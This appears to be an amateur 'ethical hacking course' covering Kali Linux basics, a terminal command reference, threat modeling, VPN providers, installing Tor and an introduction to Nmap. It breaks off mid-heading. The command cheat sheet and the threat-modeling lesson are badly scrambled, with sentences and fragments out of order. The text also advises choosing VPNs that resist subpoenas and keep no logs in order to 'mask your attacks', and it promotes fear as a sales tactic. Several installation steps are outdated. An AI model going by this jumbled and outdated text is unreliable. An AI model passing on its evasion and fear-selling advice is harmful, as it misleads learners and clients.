Ethical Hacking Course From KYAnonymous




Lesson 1: Introduction to Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp Suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer's hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.

From the Kali website: Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.

Kali Linux Features

Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.

- More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality.
- Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux.
- Open source Git tree: We are huge proponents of open source software and our development tree is available for all to see, and all sources are available for those who wish to tweak and rebuild packages.
- FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc.
- Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.
- Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments, so our kernel has the latest injection patches included.
- Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols.
- GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed, and the repositories subsequently sign the packages as well. In practice this means apt refuses any package whose signature does not verify against the Kali archive key; if you ever see a NO_PUBKEY error, reinstall the key from the Kali site rather than disabling signature checks, and check a downloaded ISO against the signed SHA256SUMS file before you boot it.
- Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.
- Completely customizable.
- ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali's ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution, so tools for ARM will be updated in conjunction with the rest of the distribution.

Kali is currently available for the following ARM devices:
- rk3306 mk/ss808
- Raspberry Pi
- ODROID U2/X2
- Samsung Chromebook
- EfikaMX
- Beaglebone Black
- CuBox
- Galaxy Note 10.1
Okay class, it's important to realize that Kali adds a menu for launching its tools, unlike earlier BackTrack installs where you typed everything into a terminal, but the tools themselves are almost all command-line programs: picking one from the menu just opens it inside a terminal window. Terminal is like the Windows command prompt, with a difference you will be quick to notice: Windows file paths use the backslash \ while the Linux environment uses the forward slash /, and a full path starts with / (the root of the filesystem).

***Important*** File paths are case sensitive, and when launching a program you type its complete file name, extension included. Ex. /root/user/admin/torhammer.py. Linux does not care about extensions the way Windows does; the ".py" is simply part of the name, and you run the file either as python torhammer.py or as ./torhammer.py once it is marked executable.

Another cool thing about Kali, and Linux in general, is that when you learn a programming language you can write your own programs in a plain text editor, save the file as something like "hacklikeaboss.py", mark it executable, andddddd voila! Your very own custom program has been created. Marking it executable can be done from the file manager (right click, Properties, Permissions, "allow executing file as program") or from the terminal with chmod +x hacklikeaboss.py; put #!/usr/bin/env python3 on the first line so the system knows which interpreter to use.

Enough about Kali, I'm sure you're ready to get started on lesson 2.

Lesson 2: Real World Applications for Kali Linux, forming your own business, and introduction to terminal, the hacker's best friend

Greetings class. Real world applications for Kali Linux are very diverse, and in today's day and age everyone is digital. Thousands of people either own their own business or work from home, and access things like customer data and even credit card transaction information. Some people run their business sites via WordPress. A Kali Linux application for this would be a tool called wpscan, which scans the site for vulnerabilities, allowing you to report them to the sitemaster or admin. Reviewing those findings consumes a good portion of time for the client. If someone were to access that data because of a faulty line of code in the site, the owner could not only lose their investment but lose customers and customer data as well.

Small business examples: "Every 9 seconds a personal computer is hacked." Looking up articles about local businesses around your area, and even college databases being breached, can not only raise awareness but also raise the fear factor. Ever heard the term "a little fear is healthy"? Well, fear sells. Stressing the importance of data security to the customer is an integral part of the sales pitch, which we will review later on. Incorporating these stories into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company. These are the businesses that you will start with at first to build a reputation; even blog about them daily as events happen.

Another tool to use would be nmap. This tool scans hosts for open ports on whatever network you are connected to, wired or wireless. Open ports are like open doors that anyone with the right knowledge can access. Always get permission: it's illegal to scan without permission, so get the authorization, and the exact list of addresses it covers, in writing before you run anything against a client.

Now on to terminal. You will find when launching these programs via the drop-down menu that they launch a sort of command prompt via a program called terminal. Terminal accepts your commands and runs basically every function on Kali, and this is where you will spend most of your time. At the time of writing Kali was preconfigured to run as root, so a tutorial in sudo wasn't necessary; since Kali 2020.1 the default user is unprivileged and you prefix administrative commands (including the apt-get commands below) with sudo.

Every time you start Kali, especially if it's a live disk and not a full install, I recommend opening up a terminal first thing and typing apt-get update. This refreshes the package lists so apt knows what versions are available. You can then upgrade the installed software with apt-get upgrade (Kali's own documentation recommends apt full-upgrade, which also handles packages whose dependencies changed).

Learn the Commands

apropos subject – List manual pages for subject
man -k keyword – Display man pages containing keyword
man command – Show the manual for command
man -t man | ps2pdf - > man.pdf – Make a pdf of a manual page
which command – Show full path name of command
time command – See how long a command takes
whereis app – Show possible locations of app
which app – Show which app will be run by default; it shows the full path

Keyboard Shortcuts

Enter – Run the command
Up Arrow – Show the previous command
Ctrl + R – Allows you to type a part of the command you're looking for and finds it
Ctrl + Z – Stops the current command; resume with fg in the foreground or bg in the background
Ctrl + C – Halts the current command, cancels the current operation and/or starts with a fresh new line
Ctrl + L – Clear the screen
command | less – Sends the output through a pager so you can scroll it with the arrow keys and PgUp/PgDn (q to quit)
!! – Repeats the last command
command !$ – Repeats the last argument of the previous command
Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it before executing the command
Ctrl + A – Return to the start of the command you're typing
Ctrl + E – Go to the end of the command you're typing
Ctrl + U – Cut everything before the cursor to a special clipboard (the whole line if the cursor is at the end)
Ctrl + K – Cut everything after the cursor to a special clipboard
Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to
Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right; try it!)
Ctrl + W – Delete the word / argument left of the cursor in the current line
Ctrl + D – Log out of current session, similar to exit

Other commands are listed below.

System Info

date – Show the current date and time
cal – Show this month's calendar
uptime – Show current uptime
w – Display who is online
whoami – Who you are logged in as
finger user – Display information about user
uname -a – Show kernel information
cat /proc/cpuinfo – CPU information
cat /proc/meminfo – Memory information
df -h – Show disk usage
du – Show directory space usage
free – Show memory and swap usage
create dir2 if it doesn't exist cp file /home/dirname – Copy the filename called file to the /home/dirname directory mv file /home/dirname – Move the file called filename to the /home/dirname directory mv file1 file2 – Rename or move file1 to file2. and world by adding: 4 – read (r). write. group. rx for group and world For more options. execute for all chmod 755 – rwx for owner.2 – write (w). this assumes you have already used the command updatedb (see next) updatedb – Create or update the database of files on all file systems attached to the Linux root directory which filename – Show the subdirectory containing the executable file called filename grep TextStringToFind /dir – Starting with the directory called dir. look for the file containing the string filename locate filename – Find a file called filename using the locate command. 1 – execute (x) Examples: chmod 777 – read. which can be found separately for user. moves file1 into directory file2 ln -s file link – Create symbolic link link to file touch file – Create or update file cat > file – Places standard input into file cat file – Display the file called file . look for the file called filename find / -name ”*filename*” – Starting with the root directory.Searching grep pattern files – Search for pattern in files grep -r pattern dir – Search recursively for pattern in dir command | grep pattern – Search for pattern in the output of command locate file – Find all instances of file find / -name filename – Starting with the root directory. see man chmod. look for and list all files containing TextStringToFind File Permissions chmod octal file – Change the permissions of file to octal. 
File Commands ls – Directory listing ls -l – List files in current directory using long format ls -laC – List all files in current directory in long format and display in columns ls -F – List files in current directory and indicate the file type ls -al – Formatted listing with hidden files cd dir – Change directory to dir cd – Change to home mkdir dir – Create a directory dir pwd – Show current directory rm name – Remove a file or directory called name rm -r dir – Delete directory dir rm -f file – Force remove file rm -rf dir – Force remove an entire directory dir and all it’s included files and subdirectories (use with extreme caution) cp file1 file2 – Copy file1 to file2 cp -r dir1 dir2 – Copy dir1 to dir2. if file2 is an existing directory. tar – Extract the files from file.more file – Display the file called file one page at a time.tar containing files tar xf file. proceed to next page using the spacebar head file – Output the first 10 lines of file head -20 file – Display the first 20 lines of the file called file tail file – Output the last 10 lines of file tail -20 file – Display the last 20 lines of the file called file tail -f file – Output the contents of file as it grows.d/init.gz – Extract a tar using Gzip tar cjf file.d/init.bz2 – Create a tar with Bzip2 compression tar xjf file.tar. 
starting with the last 10 lines Compression tar cf file.gz – Decompresses file.d/lpd stop – Stop the print daemon /etc/rc.tar files – Create a tar named file.d/init.d/lpd status – Display status of the print daemon lpq – Display jobs in print queue lprm – Remove jobs from queue lpr – Print a file lpc – Printer control tool man subject | lpr – Print the manual page called subject as plain text man -t subject | lpr – Print the manual page called subject as Postscript output printtool – Start X printer setup interface Network ifconfig – List IP addresses for all devices on the local machine iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency) iwlist – used to display some additional information from a wireless network interface that is not displayed by iwconfig ping host – Ping host and output results whois domain – Get whois information for domain dig domain – Get DNS information for domain dig -x host – Reverse lookup host wget file – Download file wget -c file – Continue a stopped download SSH ssh user@host – Connect to host as user ssh -p port user@host – Connect to host on port port as user ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login User Administration .gz files – Create a tar with Gzip compression tar xzf file.gz gzip -d file.tar tar czf file.bz2 – Extract a tar using Bzip2 gzip file – Compresses file and renames it to file.tar.d/lpd start – Start the print daemon /etc/rc.gz back to file Printing /etc/rc.tar.tar. 
same as above startx – Start the X system .deb – install a DEB package (Debian / Ubuntu / Linux Mint) rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora) Stopping & Starting shutdown -h now – Shutdown the system now and do not reboot halt – Stop all processes .same as above shutdown -r 5 – Shutdown the system in 5 minutes and reboot shutdown -r now – Shutdown the system now and reboot reboot – Stop all processes and then reboot . resume a stopped job in the background fg – Brings the most recent job to foreground fg n – Brings job n to the foreground Installation from source ./configure make make install dpkg -i pkg.adduser accountname – Create a new user call accountname passwd accountname – Give accountname a new password su – Log in as superuser from current login exit – Stop being superuser and revert to normal user Process Management ps – Display your currently active processes top – Display all running processes kill pid – Kill process id pid killall proc – Kill all processes named proc (use with extreme caution) bg – Lists stopped or background jobs. and whom you’re working with. Fear sells. and what stops others from accessing it. 100 percent of the time. In order to answer the second question. you must determine what you need to protect. there are five main questions you should ask yourself: What do you want to protect?Who do you want to protect it from?How likely is it that you will need to protect it?How bad are the consequences if you fail?How much trouble are you willing to go through in order to try to prevent those? When we talk about the first question. . who has access to it. You ask them and they say they are running sql databases. “Who do you want to protect it from. Digital security isn’t about which tools you use. contact lists. where it’s kept. and files are all assets. It's this fear that drives us to protect ourselves against the unknown. Now for a little roleplay. you should conduct a threat modeling assessment. 
today's lesson will be on threat assessment. Your devices are also assets. rather. Modeling There is no single solution for keeping yourself safe online. or who is your adversary. Write down a list of data that you keep. Examples of potential adversaries are your boss. An adversary is any person or entity that poses a threat against an asset or assets. I hope you have had time to experiment with terminal commands and familiarize yourelves with the file structure of Kali Linux. storing customer information on encrypted servers. and has an option for member sign up. your emails. An assett is something you value and want to protect. in short. we often refer to assets. It's this fear that tells us money isn't a factor when it comes to protecting our investments. or the things that you are trying to protect. For example. it’s about understanding the threats you face and how you can counter those threats. Threats can change depending on where you’re located. When conducting an assessment. To become more secure. Company xyz is a fortune 500 company. processing credit cars and bank transactions. Therefore. How would you approach the company to sell your business? Respond to this email with your answer. the assets in question are usually information.” it’s important to understand who might want to target you or your information.Lesson 3: Threat assessment and how to sell it Good morning class. who buys and trades domains on the market. your government. what you’re doing. and whom you need to protect it from. or a hacker on a public network. When we are talking about digital security. So. instant messages. My answer will be included in lesson 4 Now on threat assessment. in order to determine what solutions will be best for you. In a military context. as do their attacks.Make a list of who might want to get ahold of your data or communications. A hacker on an open Wi-Fi network can access your unencrypted communications. 
Conducting a risk analysis is both a personal and a subjective process.What is the actual risk of someone breaking in? Is it likely? Once you have asked yourself these questions. your mobile phone provider has access to all of your phone records and therefore has the capability to use that data against you. you are in a position to assess what measures to take. an adversary can read your private communications as they pass through the network. but the risk of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where they are not). If you want to keep your house and possessions safe. A threat is something bad that can happen to an asset. A government trying to prevent the spread of a video showing police violence may be content to simply delete or reduce the availability of that video. There are numerous ways that an adversary can threaten your data. because the mere presence of the threat at any likelihood is not worth the cost. a government agency. It might be an individual. risk is the likelihood that the threat will occur. but the risk of a break-in is low. in many civilian contexts. Now. While a threat is a bad thing that can happen. here are a few questions you might ask: Should I lock my door?What kind of lock or locks should I invest in?Do I need a more advanced security system?What are the assets in this scenario?The privacy of my homeThe items inside my homeWhat is the threat?Someone could break in. or a corporation. While your mobile phone provider has the capability to access all of your data. The capability of your attacker is also an important thing to think about. if the risk is high. there is a threat that your building might collapse. It is important to distinguish between threats and risks. In other cases. the risk of them posting your private data online to harm your reputation is low. and goes hand-in-hand with capability. 
Risk is the likelihood that a particular threat against a particular asset will actually occur. For example. The motives of adversaries differ widely. people disregard high risks because they don't view the threat as a problem. then you probably won’t want to invest too much money in a lock. Write down what your adversary might want to do with your private data. An adversary could also disable your access to your own data. not everyone has the same priorities or views threats in the same way. For example. Your government might have stronger capabilities. A final thing to consider is risk. or they can delete or corrupt your data. it's more important for an asset such as email service to be available than confidential. If your possessions are valuable. whereas a political opponent may wish to gain access to secret content and publish it without you knowing. and perhaps even add a security system. On the other hand. it might be preferable for an asset to be destroyed than for it to fall into enemy hands. Conversely. for example. you’ll want to get the best locks on the market. Many people find certain threats unacceptable no matter what the risk. let’s practice threat modeling. . For instance. You can then do things like access file servers. A VPN can be thought to create a "tunnel" through the public network to your private network at the other end. and other services you might not have access to outside of your work network. video chat. So when you're travelling overseas you can still view websites you would normally use at home. etc. email. Otherwise it is relatively easy for other people to view your network traffic. and access other services. movie and music streaming websites. and games will not work. and a VPN provides a way to still maintain access to the services you would normally use.) and wireless networks knowing your network traffic is kept safe and secure. 
Access Location Restricted Content: By connecting to a VPN server in another location you can make it appear to websites using geolocation that you are physically in the correct location for access. Viscosity even allows you to tunnel through a HTTP or SOCKS proxies to establish your VPN connection. This allows you to use public networks (such as at hotels. VPN. Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed. view iTunes shares. meaning that many applications like VOIP. or one provided by a commercial VPN service. If you are hired to test the security already in place. Opsec is essential as to not let your opponent know that you are on to them. What Does A VPN Let Me Do? A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard network. take remote control of your computer. Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you were physically in the office. Opsec stands for "operational security" and is a term coined by the special forces in the United States military. This includes: Network Security & Privacy: All network traffic through your VPN connection is kept secure. computers. such as see what you are viewing. such as television. All network traffic through this tunnel is encrypted to ensure it is kept secure and private. This remote network is typically a private network. However using a VPN you can tunnel through such restrictions and allow all of your network applications to work. Access Your Home Network: Connecting back home using a VPN allows you to access your computers remotely. Why Should I Use A VPN? . Some countries impose censorship on Internet access while in that country. such as a workplace or home network.Lesson 4: Opsec. Tor. databases. steal your information and login details. coffee shops. instant messenging. etc. When it comes to hacking. internal webpages. 
Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that would otherwise be blocked. Access files on your computer. Virtual Private Networks or VPNs: What Is A VPN? A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the Internet) to a remote network/location. conferences. it would be obvious that you would need to learn ways to mask your attacks. VPN Service Providers There are many companies that specialize in providing a commercial VPN service. allowing you to not only get the security and privacy benefits on a VPN. Public networks. Like IPSec and PPTP.Even if you have no desire to be able to access a private network remotely. It is installed on the user's computer and communicates with the VPN server to create a secure link for the user's network traffic. How Does A VPN Work? A typical VPN consists of two components: the VPN client and the VPN server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN. All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it private and secure. 1) do they cooperate with united states gov subpoenas 2 do they keep logs (you dont want logs) TorGuard TorGuard's claim to fame is that they offer specific types of servers for different activities. provide an easy way for hackers and malicious users to listen in ("sniff") on your network usage. and in particular public wireless networks. In addition. steal session information to be able to log into sites as you. and compatibility with most network environments. making it secure and private. OpenVPN handles the connection between the VPN client and server. A VPN client is the software that allows a user to connect their computer to the VPN server and establish the VPN connection. This allows them to not only monitor in depth your network traffic. 
a VPN is vital to ensure the security and privacy of your network traffic. What Is OpenVPN? OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Most VPN Service Providers charge a small monthly or yearly fee for access to their servers. but also alter your traffic or inject their own in an attempt to fool a user into revealing important data. OpenVPN is rapidly gaining in popularity thanks to its high level of security. Viscosity performs the duties of a VPN client. however there are also a number of free service providers. skilled hackers may perform a "man in the middle" attack. These companies are known as "VPN Service Providers". The VPN Client is what the end user uses to control their VPN connection. and extract other private data. A VPN server is setup at the location users want to connect to. End users rarely have to interact with the VPN Server. The key to choosing a quality vpn comes down to two factors. as your network traffic is authenticated and encrypted. but also making it easy to access websites that restrict access to certain counties. That gives you the ability to connect to torrent-friendly services if you need to download something. A VPN Server usually configured and maintained by IT staff. VPN Service Providers often have servers in multiple countries. customizability. however home users often set up their own VPN personal VPN server at home or at a remote location as well. This may allow them to see what web pages you are viewing. such as at a workplace or at home. steal username and passwords. Using a VPN protects you from such attacks. encryption and anonymity- . How they manage to do it is impressive. and even offer their customers encrypted. TorGuard has different plans for you. and they have less expensive plans if you just want an anonymous proxy or a torrent proxy. They offer free and paid subscription plans. Their full VPN service however features over 200 exit servers in 18 countries. 
usually used by corporate networks. Like any good. They're also one of the few VPN service providers to take DNS leaking seriously. and only log a few things.) IPVanish earned high praise in the call for contenders thread for its speed while connected. Accounts with IPVanish are$10/mo or $78/yr. They support OS X. or specific "agencies. and improved security from the ground up. They use shared IP addresses. They do retain some information. Torrentfreak gave them the nod as well. Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt or inspect encrypted data. still impressive for a free service). The service proudly notes that they're happy with you streaming video or music while you're connected to get around pesky content blocks. they mean it.0000 IPs to share on over a hundred exit servers in 47 different countries. help you get connected via your home network. They also support multiple connectivity protocols. don't monitor your activities. but not much. university networks. but the service manages to hold itself to a high standard of privacy and security while giving you breakneck speeds that you may not be accustomed to with a VPN. their full VPN service will set you back $10/mo or $60/yr. so if you just need a little security on the go. they made a great showing in the call for contenders thread. no logging or data retention of any kind.") You also noted that they support OpenVPN. They offer your choice of exit servers in 23 different countries (free users can pick from one of 14.friendly servers if you just need a little privacy and security. especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back home or make use of their streaming music subscription. and they offer configuration utilities so you can set you home router to connect to them as well. 
and you can see server status at any time. they both encrypt all of the data that passes through your connection and anonymize your location. They feature multiple connection protocols. along with iOS and Android. and Ubuntu (although it wouldn't be too hard to stretch that to other distributions). and you can connect two devices at once (as long as they're using different protocols). The service just went through a massive overhaul about a year ago. and have great customer service. They delivered a really great response to Torrentfreak's questions that's well worth a read for more info. you may be able to get away with a free account. trustworthy VPN provider. which again is perfect for getting around location restrictions. You can choose where you'd prefer to connect. Depending on your usage habits and patterns. Windows. and they don't monitor what you're doing while you're connected. That doesn't mean they're compromising security though—they have over 14. CyberGhost doesn't log any traffic. so when they say no one has any idea what you're doing when you're connected.

IPVanish VPN
IPVanish takes an interesting approach to privacy and security. For our purposes though. offshore email service if you want to take advantage. support for virtually every desktop and mobile OS. and their network is set up in a way that they actually have no information to collect on their user activities—they don't know what you're doing or when you're connected.

CyberGhost VPN
CyberGhost has been around for a long time. where they removed traffic and bandwidth restrictions for free accounts. and so on. and their encryption makes sure your traffic is safe from prying eyes. don't discriminate against traffic types or port usage. and they even offer their own test to make sure that your VPN—even if you don't use them—isn't leaking DNS and thus information you thought was secure. We have more than a few honorable mentions this week. The feature set and the face of the company both look good. and they're improving their service all the time. Of course. it just takes the skill and knowhow to do it. and they have no idea when you're connected. they have a history of logging user data. protocols. If you're looking to walk the line between a truly DIY option and a VPN that you roll at home. support virtually every mobile and desktop platform. who are constantly working to improve and update their service to help you get around regional restrictions and blocks—and recently unveiled a browser add-on to tunnel some services but not others. Those of you who praised the service noted their great connection speeds. The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 hours. 000 licenses to users in Turkey to get around their location-blocks. Similarly. They did very well in the call for contenders thread—although many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. and they combine Usenet with VPN services which is great. Their clients are easy to use. while pro accounts can use other connection protocols and have way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account. and this Reddit thread is rather illuminating as well. no list of great options would be complete without the DIY approach.

Do-It-Yourself
Of course. you'll need to step up to Premium Plus. Read more in the nomination thread here. You can use VyprVPN as a stand-alone VPN client. configure. and more for up to 90 days. giving you even more control over your connection. open-source tools. and they don't log. advanced users can fire up a VPN on their preferred host or VPS provider and keep their VPN running there while they connect to it when necessary. The sky's the limit with the DIY option. wealth of servers to choose from (even for free users). However. this setup is best for people traveling who want to encrypt their data while they're on the go. but if you need more than one device connected at any given time. a popular pick that packs in way more features than you might possibly need. pick and choose exit services in multiple countries. don't discriminate against protocols. cagey with me when I last spoke to a rep from the company. Still. but you'll sign up for Giganews when you get it. and then connect to externally. you can roll your own VPN with OpenVPN or a number of other free. Hideman VPN. and are limited to the official client. which was a really tough call. and even generate an OpenVPN config through their wizard to connect your home network to their service all the time—oh. the Usenet service provider. sometimes a lot of user data. If you don't need exit servers in different countries. They have multiple exit servers in multiple countries. it's easy to set up a mesh network that would get you around content restrictions and port blocks. and they don't discriminate against traffic types. but with a couple of friends. for their cross-platform. but we don't feel comfortable calling them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of your data. no-logging VPN service—complete with free VPN options for people just looking for a little security on the go without shelling out for a premium service. the DD-WRT or Tomato firmwares do. and some compromise on the level of features and tools you get. The beauty of a home-rolled VPN is that you get to set the level of encryption. That's not an issue if you don't care about logging. they're worth a look. We'll also give the nod to AirVPN. and even if they don't. and at the very least log user sessions and data for troubleshooting. but they were cagey with Torrentfreak back in 2011 on the topic. you get complete control over who connects and who has access to what parts of your home network.
including one of my personal favorites. We should also highlight VyprVPN. and where your data goes from there. A final note—something we mentioned when we talked—don't fall into the geography trap. assuming that an overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in your own or subject to your own laws. mobile-friendly. Many of the best routers on the market support OpenVPN out of the box. or IP addresses (in fact. there are signs that things may be changing with VyprVPN. they just donated 10. so if you can install those on your router. acceptable use issues. You can forward remote ports. VyprVPN is owned by the same company that owns Giganews. Also noteworthy are the great people over at Tunnelbear. and your primary need is to encrypt and secure your data when you're away from home. at $11/mo and $70/yr. A local VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who asks—and there are definitely VPN providers that fall in both categories.

Tor Browser Bundle 4.0.4

The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor — a privacy oriented encrypted anonymizing service — has announced the launch of its next version of Tor Browser Bundle, i.e. Tor Browser Bundle 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of online users on the Internet.

Tor Browser helps users to browse the Internet in a completely anonymous way. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere.

Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy oriented services and is mostly used by activists and journalists to circumvent online censorship and surveillance efforts by various countries.

NEW FEATURES
The latest version, the new Tor version 4.0.4, has been recently released with a small number of new features:
Updated Firefox to 31.5.0esr with important security updates.
Update OpenSSL to 1.0.1l
Update NoScript to 2.6.9.15
Update HTTPS-Everywhere to 4.0.3

BUG FIXES
Tor version 4.0.4 also includes some bugfixes:
Bug 14203: Prevent meek from displaying an extra update notification
Bug 14849: Remove new NoScript menu option to make permissions permanent
Bug 14851: Set NoScript pref to disable permanent permissions

"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team.

Meanwhile, last month 12 high-capacity Tor middle relays were launched by Polaris — a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce the finite number of Tor connections occurring at the same time. On the other side, late last year we have seen a large scale cyber attack on the Tor network that quietly seized some of its specialized network servers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays in the anonymous network service.

Installing Tor in Kali Linux:

Step 1: Getting tor service ready
There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options:

Option #1: Install Tor from Kali Repository
Tor is available in Kali repository. To install it directly from the repository open your Terminal and type this:
apt-get install tor
If no error occurs, follow the second step.

Option #2: Install Tor from Debian Wheezy Repository
If you can’t install Tor using the first method then you may try this option. In this way we are going to add the official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian and it uses the package management from “Wheezy”. So we are going to use “Wheezy” as our distribution. Now open your terminal and follow these steps:

Step #1: Add repo to sources.list file
Let's add the distribution in the list by opening the sources.list file:
leafpad /etc/apt/sources.list
Now add the following line at the bottom of the file:
deb http://deb.torproject.org/torproject.org wheezy main

Step #2: Add GPG Keys
Now we need to add the gpg key used to sign the packages by running the following commands:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -

Step #3: Update package lists
Let's refresh our sources:
apt-get update

Step #4: Install signing keys
Now, before installing Tor we must add the signing key keyring:
apt-get install deb.torproject.org-keyring

Step #5: Install Tor from Debian repository
Finally:
apt-get install tor
Now Tor should be installed! If no error occurs, follow the second step.

Option #3: Install Tor from development branch
If you are an advanced user and you want to install Tor using the development branch then this method is for you.
Note: This release will provide you more features but it contains bugs too.

Step #1: Add Tor project repository to sources.list
You need to add a different set of lines to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
deb-src http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main

Step #2: Add GPG keys, keyring and install Tor
Then run the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
apt-get update
apt-get install deb.torproject.org-keyring
apt-get install tor
Now Tor should be installed! If no error occurs, follow the second step.

Option #4: Build and Install Tor from sources
If you want to build your own debs from source you must first add an appropriate deb-src line to sources.list:
deb-src http://deb.torproject.org/torproject.org wheezy main
deb-src http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
You also need to install the necessary packages to build your own debs and the packages needed to build Tor:
apt-get install build-essential fakeroot devscripts
apt-get build-dep tor
Then you can build Tor in ~/debian-packages:
mkdir ~/debian-packages; cd ~/debian-packages
apt-get source tor
cd tor-*
debuild -rfakeroot -uc -us
cd ..
Now you can install the new package:
dpkg -i tor_*.deb

Step #2: Downloading and Running Tor bundle
Download the Tor Bundle from here: https://www.torproject.org/projects/torbrowser.html.en
Download the architecture-appropriate file above, save it somewhere, then run one of the following two commands to extract the package archive:
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz
or (for the 64-bit version):
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz
(where LANG is the language listed in the filename).
Once that’s done, switch to the Tor browser directory by running:
cd tor-browser_LANG
(where LANG is the language listed in the filename).
To run the Tor Browser Bundle, execute the start-tor-browser script:
./start-tor-browser
This will launch Vidalia and once that connects to Tor, it will launch Firefox.
Note: Do not unpack or run TBB as root (though in Kali Linux, it doesn’t make any difference).
Lesson 5: Introduction to NMap

Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration. Its GUI is user friendly and boasts a wide variety of features.

Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. Nmap newbies should not expect to understand everything at once. This is simply a broad overview of features that are described in depth in later chapters. The “solutions” included throughout this book demonstrate many other common Nmap tasks for security auditors and network administrators. An important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and copyright.

Nmap Overview and Demonstration

Sometimes the best way to understand something is to see it in action. This section includes examples of Nmap used in (mostly) fictional yet typical circumstances.

Avatar Online

